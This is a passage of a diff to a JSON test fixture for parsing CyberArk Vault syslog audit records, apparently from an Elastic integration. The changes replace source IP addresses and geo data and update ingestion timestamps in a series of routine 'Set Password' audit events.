\u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPGW_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:55\",\"IsoTimestamp\":\"2021-03-11T16:59:55Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_VAGRANT\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:13.320185600Z", + "original": "\u003c5\u003e1 2021-03-11T16:59:55Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:55\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:55Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPGW_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:55\",\"IsoTimestamp\":\"2021-03-11T16:59:55Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_VAGRANT\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" } @@ -850,19 +744,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "34.66.114.180", - "ip": "34.66.114.180" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -879,7 +762,7 @@ }, "related": { "ip": [ - "34.66.114.180" + "67.43.156.15" ] }, "cyberarkpas": { @@ -887,8 +770,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-11T20:10:33Z", - "station": "34.66.114.180", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 12:10:33\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T20:10:33Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e88\u003c/MessageID\u003e\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\n \u003cAction\u003eSet Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e34.66.114.180\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eSet Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 12:10:33\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T20:10:33Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e88\u003c/MessageID\u003e\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\n \u003cAction\u003eSet Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eSet Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Set Password", "message": "Set Password", "issuer": "PSMApp_ASR-WIN", @@ -902,8 +785,8 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212165200Z", - "original": "\u003c5\u003e1 2021-03-11T20:10:33Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:10:33\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:10:33Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e34.66.114.180\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 12:10:33\",\"IsoTimestamp\":\"2021-03-11T20:10:33Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"34.66.114.180\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:13.320191300Z", + "original": "\u003c5\u003e1 2021-03-11T20:10:33Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:10:33\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:10:33Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 12:10:33\",\"IsoTimestamp\":\"2021-03-11T20:10:33Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" } @@ -915,17 +798,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -942,7 +816,7 @@ }, "related": { "ip": [ - "34.71.250.247" + "67.43.156.15" ] }, "cyberarkpas": { @@ -950,8 +824,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-14T12:57:25Z", - "station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e88\u003c/MessageID\u003e\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPGW_SSH\u003c/Issuer\u003e\n \u003cAction\u003eSet Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eSet Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e88\u003c/MessageID\u003e\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPGW_SSH\u003c/Issuer\u003e\n \u003cAction\u003eSet Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eSet Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Set Password", "message": "Set Password", "issuer": "PSMPGW_SSH", @@ -965,8 +839,8 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212166500Z", - "original": "\u003c5\u003e1 2021-03-14T12:57:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPGW_SSH\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:25\",\"IsoTimestamp\":\"2021-03-14T12:57:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_SSH\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:13.320197Z", + "original": "\u003c5\u003e1 2021-03-14T12:57:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPGW_SSH\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:25\",\"IsoTimestamp\":\"2021-03-14T12:57:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_SSH\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" } @@ -978,17 +852,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -1005,7 +870,7 @@ }, "related": { "ip": [ - "34.71.250.247" + "67.43.156.15" ] }, "cyberarkpas": { @@ -1013,8 +878,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-14T12:57:25Z", - "station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e88\u003c/MessageID\u003e\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\n \u003cAction\u003eSet Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eSet Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e88\u003c/MessageID\u003e\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\n \u003cAction\u003eSet Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eSet Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Set Password", "message": "Set Password", "issuer": "PSMPApp_SSH", @@ -1028,8 +893,8 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212167700Z", - "original": "\u003c5\u003e1 2021-03-14T12:57:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:25\",\"IsoTimestamp\":\"2021-03-14T12:57:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_SSH\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:13.320203Z", + "original": "\u003c5\u003e1 2021-03-14T12:57:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\\n 